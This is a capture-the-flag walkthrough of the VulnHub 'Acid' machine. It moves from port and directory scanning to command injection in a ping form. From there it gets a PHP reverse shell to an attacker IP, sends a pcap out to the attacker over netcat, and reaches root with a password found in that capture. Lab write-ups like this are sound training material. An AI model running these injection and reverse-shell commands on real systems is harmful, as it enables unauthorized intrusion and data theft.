Since Fart knocker in June I have worked on an other vulnhub machine: darknet. But this one is really hard and get me stuck. I was a bit demotivated to continue vulnhub's machines but I got some time this week, therefore I tried the Acid one.
The goal is as usual, get root on the virtual machine. Let's go:
We launch nmap against the virtual machine:
$ nmap 192.168.0.18 -p0-65535 -A -oA nmap Starting Nmap 6.47 ( http://nmap.org ) at 2015-09-08 12:08 CEST Stats: 0:07:31 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 98.89% done; ETC: 12:15 (0:00:05 remaining) Nmap scan report for 192.168.0.18 Host is up (0.0045s latency). Not shown: 65535 closed ports PORT STATE SERVICE 33447/tcp open unknown |_http-title: /Challenge Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
We got a nice Apache web server with a simple splash screen. Notice the page title: /Challenge.
I ran nikto on the target but nothing pop out.
As we come pretty empty handed, we check the page source and two interesting things came out:
- Some hexadecimal code at the end of the page: 0x643239334c6d70775a773d3d
- the title of the page (we can see it in the nmap scan) is /Challenge and there is an other web page at this address.
We will start with the first lead the hexadecimal code:
We convert it to string and we got:
We decode the base64 and we got:
We go to the url (the /images/ is given with the background image of the first web page):
As a result we got a nice image that reward us for our success.
Yeah it seems to be some troll :)
Let us dig the second lead: the page title. By adding
/Challenge in the URL,
we land on an authentication interface.
I tried to use SQL injection but nothing. We will try dirbuster with the small dictionary (`/usr/share/dirbuster/directory-list-2.3-small.txt):
DirBuster 1.0-RC1 - Report http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project Report produced on Tue Sep 08 16:54:05 CEST 2015 -------------------------------- http://192.168.0.18:33447 -------------------------------- Directories found during testing: Dirs found with a 200 response: /Challenge/ Dirs found with a 403 response: /Challenge/css/ /Challenge/includes/ /Challenge/js/ /Challenge/styles/ /Challenge/less/ -------------------------------- Files found during testing: Files found with a 200 responce: /Challenge/index.php /Challenge/error.php /Challenge/includes/functions.php /Challenge/cake.php Files found with a 302 responce: /Challenge/include.php /Challenge/includes/logout.php /Challenge/hacked.php --------------------------------
We got the
cake.php page but as we all know "The cake is a lie". We noticed
that the page title is one more time a folder:
When going to
/Challenge/Magic_box we got a 403 forbidden page. Let us fire
DirBuster 1.0-RC1 - Report http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project Report produced on Tue Sep 08 17:17:43 CEST 2015 -------------------------------- http://192.168.0.18:33447 -------------------------------- Directories found during testing: Dirs found with a 403 response: /Challenge/Magic_Box/ /Challenge/Magic_Box/proc/ -------------------------------- Files found during testing: Files found with a 200 responce: /Challenge/Magic_Box/low.php /Challenge/Magic_Box/command.php Files found with a 302 responce: /Challenge/Magic_Box/proc/validate.php --------------------------------
We got some nice result mostly the
The page let us ping an other machine in the network. Nevertheless the page name
let us think that we can use command exploitation. If we add a
; in the filed
and a command it seems to works, for instance with
; ls we got (I use
burp for all my pentest, the output of the
command is in the response page):
command.php command.php.save command2.php.save command2.php.save.1 low.php proc tails.php
We can also read
/etc/passwd: there is two users on the server: acid and
Let us try to get a reverse shell with that.
As always, a good source of information is pentest monkey.
We know the site use php so we will try the php reverse shell first:
- On the host we execute:
nc -l -p 6666
- On the target (via the ping interface) we query:
; php -r '$sock=fsockopen("192.168.0.13",6666);exec("/bin/sh -i <&3 >&3 2>&3");'
It got us a shell on the machine (without tty/pty). But executing the request in the ping interface each time we want the shell in painful, so I extract the curl command from burp:
curl -i -s -k -X 'POST' \ -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0' -H 'DNT: 1' -H 'Referer: http://192.168.0.18:33447/Challenge/Magic_Box/command.php' -H 'Content-Type: application/x-www-form-urlencoded' \ -b 'sec_session_id=2cdjrm9k6khpfiilsad1kmnpj2' \ --data-binary $'IP=%3B+php+-r+%27%24sock%3Dfsockopen%28%22192.168.0.13%22%2C6666%29%3Bexec%28%22%2Fbin%2Fsh+-i+%3C%263+%3E%263+2%3E%263%22%29%3B%27&submit=submit' \ 'http://192.168.0.18:33447/Challenge/Magic_Box/command.php'
Now that we have a shell, let us see what we can do.
First we discover what is at our disposal, mostly in the
bash_history). In the
/home/acid/ there is something interesting but
ls -la /home/acid/.su* -rw-r--r-- 1 acid acid 0 Jul 31 17:27 /home/acid/.sudo_as_admin_successful
Let us see what else we got on the machine:
$ ls / bin boot cdrom dev etc home initrd.img lib lost+found media mnt opt proc root run s.bin sbin srv sys tmp usr var vmlinuz $ ls /opt/ $ ls /media acid floppy floppy0 $ ls /s.bin investigate.php $ cat /s.bin/investigate.php <?php echo "Now you have to behave like an investigator to catch the culprit\n"; ?
That is interesting the php file in
/s.bin/ clearly tell us to investigate.
But what we need know is a privilege escalation ti gain root access.
I tried the overlayfs exploit (the same as with Fart knocker) without success:
- I compiled the exploit on an other 32 bits virtual machine;
- I transfered it to the shell via netcat;
And it failed:
$ ./ofs.bin : 4: spawning threads mount #1 mount #2 child threads done exploit failed
But we were given an hint.
The pwnwiki.io wiki is always a
good source of information. So with more investigation we look at bash_history,
*txt* files, an so on. Then
$ find / -name *pcap* 2>/dev/null /lib/modules/3.19.0-15-generic/kernel/drivers/rtc/rtc-pcap.ko /lib/modules/3.19.0-15-generic/kernel/drivers/input/misc/pcap_keys.ko /lib/modules/3.19.0-15-generic/kernel/drivers/input/touchscreen/pcap_ts.ko /lib/modules/3.19.0-15-generic/kernel/drivers/regulator/pcap-regulator.ko /sbin/raw_vs_isi/hint.pcapng /sbin/getpcaps /sys/bus/spi/drivers/ezx-pcap /usr/share/doc/libpcap0.8 /usr/share/mime/application/vnd.tcpdump.pcap.xml /usr/share/man/man7/pcap-filter.7.gz /usr/share/man/man1/getpcaps.1.gz /usr/lib/i386-linux-gnu/libpcap.so.1.6.2 /usr/lib/i386-linux-gnu/libpcap.so.0.8 /usr/src/linux-headers-3.19.0-15/include/linux/mfd/ezx-pcap.h /usr/src/linux-headers-3.19.0-15-generic/include/config/ezx/pcap.h /usr/src/linux-headers-3.19.0-15-generic/include/config/touchscreen/pcap.h /usr/src/linux-headers-3.19.0-15-generic/include/config/rtc/drv/pcap.h /usr/src/linux-headers-3.19.0-15-generic/include/config/input/pcap.h /usr/src/linux-headers-3.19.0-15-generic/include/config/regulator/pcap.h /var/lib/dpkg/info/libpcap0.8:i386.postinst /var/lib/dpkg/info/libpcap0.8:i386.shlibs /var/lib/dpkg/info/libpcap0.8:i386.postrm /var/lib/dpkg/info/libpcap0.8:i386.md5sums /var/lib/dpkg/info/libpcap0.8:i386.symbols /var/lib/dpkg/info/libpcap0.8:i386.list
We transfer the file with netcat:
- On our attack machine:
nc -lp 1234 > pcap
- On the server:
nc 192.168.0.13 1234 < /sbin/raw_vs_isi/hint.pcapng
We open the pcap file with wireshark. There is a lot of information in this file, over 6 000 trams. On the 6 212 we notice some sort of text. By following the TCP stream (wireshark function) we discover what seems to be a chat exchange:
hello What was the name of the Culprit ???
saman and now a days he's known by the alias of 1337hax0r
oh...Fuck....Great...Now, we gonna Catch Him Soon :D
Yes .. We have to !! The mad bomber is on a rage
Over and Out
Great, what does it means? We know that saman is one of the user on the machine. Maybe we got some hints about it password or something like that.
python -c 'import pty; pty.spawn("/bin/sh")'
/bin/sh is a symlink to dash, we directly use bash:
python -c 'import pty; pty.spawn("/bin/bash")'
We now need to try to connect as saman.
With our beautiful shell we jut have to
su saman to try to connect as saman:
www-data@acid:/var/www/html/Challenge/Magic_Box$ su saman su saman Password: 1337hax0r
It works! Let us try
saman@acid:/var/www/html/Challenge/Magic_Box$ sudo su sudo su [sudo] password for saman: 1337hax0r root@acid:/var/www/html/Challenge/Magic_Box# cat /root/flag.txt cat /root/flag.txt Dear Hax0r, You have successfully completed the challenge. I hope you like it. FLAG NAME: "Acid@Makke@Hax0r